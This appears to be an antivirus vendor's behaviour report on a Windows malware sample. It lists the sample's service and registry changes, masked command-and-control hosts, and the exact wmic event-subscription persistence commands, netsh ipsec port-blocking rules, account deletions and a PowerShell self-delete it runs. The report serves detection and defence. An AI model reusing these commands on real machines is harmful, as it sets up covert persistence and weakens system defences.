Technical Information
To ensure autorun and distribution
Sets the following service settings
- [HKLM\SYSTEM\CurrentControlSet\services\Winmgmt] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\NetSh_Fix] 'ImagePath' = '%WINDIR%\SysWOW64\netsh.exe -h'
- [HKLM\System\CurrentControlSet\Services\ShellHWDetection] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\PolicyAgent] 'Start' = '00000002'
Creates the following services
- 'NetSh_Fix' %WINDIR%\SysWOW64\netsh.exe -h
Malicious functions
To complicate detection of its presence in the operating system,
blocks execution of the following system utilities:
- Windows Defender
Injects code into
the following system processes:
- %WINDIR%\syswow64\svchost.exe
Terminates or attempts to terminate
the following system processes:
- %WINDIR%\syswow64\netsh.exe
Modifies file system
Creates the following files
- %WINDIR%\syswow64\win_help.dll
Network activity
Connects to
- 'ss#.#3ssh.com':23
- '12#.#5.129.189':81
UDP
- DNS ASK ss#.#3ssh.com
- DNS ASK do##.23ssh.com
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH __EventFilter CREATE Name=PowRun, EventNameSpace=root\cimv2,QueryLanguage=WQL,Query="SELECT * FROM __InstanceModificationEvent WITHIN 40 WHERE TargetInstance...' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filteraction name=FilteraAtion1 action=block' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filterlist name=Filter1' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ipsec static add policy name=Block' (with hidden window)
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name="NetRun"', Consumer='CommandLineEventConsumer.Name="Net_Run"'' (with hidden window)
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH CommandLineEventConsumer CREATE Name=Net_Run, CommandLineTemplate="%WINDIR%\SysWOW64\netsh.exe -h"' (with hidden window)
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH __EventFilter CREATE Name=NetRun, EventNameSpace=root\cimv2,QueryLanguage=WQL,Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance...' (with hidden window)
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name="PowRun"', Consumer='CommandLineEventConsumer.Name="Pow_Run"'' (with hidden window)
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH CommandLineEventConsumer CREATE Name=Pow_Run, ExecutablePath=%WINDIR%\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe, CommandLineTemplate="%WINDIR%\SysWOW64\...' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ipsec static set policy name=Block assign=y' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' -h' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH __EventFilter CREATE Name=PowRun, EventNameSpace=root\cimv2,QueryLanguage=WQL,Query="SELECT * FROM __InstanceModificationEvent WITHIN 40 WHERE TargetInstance...
- '%WINDIR%\syswow64\net1.exe' user lcys /del
- '%WINDIR%\syswow64\netsh.exe' -h
- '%WINDIR%\syswow64\netsh.exe' ipsec static set policy name=Block assign=y
- '%WINDIR%\syswow64\netsh.exe' ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filteraction name=FilteraAtion1 action=block
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filterlist name=Filter1
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\netsh.exe' ipsec static add policy name=Block
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name="NetRun"', Consumer='CommandLineEventConsumer.Name="Net_Run"'
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH CommandLineEventConsumer CREATE Name=Net_Run, CommandLineTemplate="%WINDIR%\SysWOW64\netsh.exe -h"
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH __EventFilter CREATE Name=NetRun, EventNameSpace=root\cimv2,QueryLanguage=WQL,Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance...
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name="PowRun"', Consumer='CommandLineEventConsumer.Name="Pow_Run"'
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH CommandLineEventConsumer CREATE Name=Pow_Run, ExecutablePath=%WINDIR%\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe, CommandLineTemplate="%WINDIR%\SysWOW64\...
- '%WINDIR%\syswow64\net1.exe' user AdminGov /del
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Start-Sleep -s 2;del "<Full path to file>"
